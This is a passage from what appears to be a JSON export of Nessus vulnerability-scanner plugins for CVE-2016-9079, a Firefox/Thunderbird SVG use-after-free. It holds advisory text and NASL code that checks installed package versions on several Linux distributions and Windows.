flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ta\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-te\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-th\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-tr\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-uk\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-uz\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-vi\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-xh\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-zh-cn\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-zh-tw\", reference:\"45.5.1esr-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:00", "description": "The version of Mozilla Firefox ESR installed on the remote Windows host is 45.x prior to 45.5.1. It is, therefore, affected by a use-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling SVG animations. An unauthenticated, remote attacker can exploit this issue, via a specially crafted web page, to deference already freed memory, resulting in the execution of arbitrary code.", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Mozilla Firefox ESR 45.x < 45.5.1 nsSMILTimeContainer.cpp SVG Animation RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MOZILLA_FIREFOX_45_5_1_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/95474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95474);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_xref(name:\"MFSA\", value:\"2016-92\");\n script_xref(name:\"CERT\", value:\"791496\");\n\n script_name(english:\"Mozilla Firefox ESR 45.x < 45.5.1 nsSMILTimeContainer.cpp SVG Animation RCE\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Mozilla Firefox ESR installed on the remote Windows\nhost is 45.x prior to 45.5.1. It is, therefore, affected by a\nuse-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling\nSVG animations. An unauthenticated, remote attacker can exploit this\nissue, via a specially crafted web page, to deference already freed\nmemory, resulting in the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 45.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9079\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:TRUE, fix:'45.5.1', min:'45.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:44", "description": "This update for MozillaFirefox fixes security issues. The following vulnerabilities were fixed in Firefox ESR 45.5.1 (bbsc#1012964) :\n\n - CVE-2016-9079: Use-after-free in SVG Animation could be used for code execution (MFSA 2016-92 bsc#1012964)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-08T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : MozillaFirefox (SUSE-SU-2016:3048-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-3048-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95627", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:3048-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95627);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-9079\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : MozillaFirefox (SUSE-SU-2016:3048-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for MozillaFirefox fixes security issues. The following\nvulnerabilities were fixed in Firefox ESR 45.5.1 (bbsc#1012964) :\n\n - CVE-2016-9079: Use-after-free in SVG Animation could be\n used for code execution (MFSA 2016-92 bsc#1012964)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012964\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9079/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20163048-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fcd8f503\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2016-1771=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2016-1771=1\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1771=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2016-1771=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2016-1771=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1771=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1771=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2016-1771=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1771=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"MozillaFirefox-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"MozillaFirefox-debuginfo-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"MozillaFirefox-debugsource-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"MozillaFirefox-translations-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"MozillaFirefox-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"MozillaFirefox-debuginfo-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"MozillaFirefox-debugsource-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"MozillaFirefox-translations-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"MozillaFirefox-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"MozillaFirefox-debuginfo-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"MozillaFirefox-debugsource-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"MozillaFirefox-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"MozillaFirefox-debuginfo-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"MozillaFirefox-debugsource-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"MozillaFirefox-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"MozillaFirefox-debuginfo-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"MozillaFirefox-debugsource-45.5.1esr-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"MozillaFirefox-translations-45.5.1esr-93.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:50", "description": "New mozilla-thunderbird packages are available for Slackware 14.1, 14.2, and -current to fix security issues.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Slackware 14.1 / 14.2 / current : mozilla-thunderbird (SSA:2016-336-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2016-336-02.NASL", "href": "https://www.tenable.com/plugins/nessus/95443", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-336-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95443);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"SSA\", value:\"2016-336-02\");\n\n script_name(english:\"Slackware 14.1 / 14.2 / current : mozilla-thunderbird (SSA:2016-336-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mozilla-thunderbird packages are available for Slackware 14.1,\n14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.408458\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ddd01641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mozilla-thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.5.1\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.5.1\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.5.1\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.5.1\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.5.1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.5.1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:43", "description": "From Red Hat Security Advisory 2016:2843 :\n\nAn update for firefox is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 / 7 : firefox (ELSA-2016-2843)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:firefox", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-2843.NASL", "href": "https://www.tenable.com/plugins/nessus/95464", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2843 and \n# Oracle Linux Security Advisory ELSA-2016-2843 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95464);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"RHSA\", value:\"2016:2843\");\n\n script_name(english:\"Oracle Linux 5 / 6 / 7 : firefox (ELSA-2016-2843)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2016:2843 :\n\nAn update for firefox is now available for Red Hat Enterprise Linux 5,\nRed Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-December/006548.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-December/006549.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-December/006550.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", 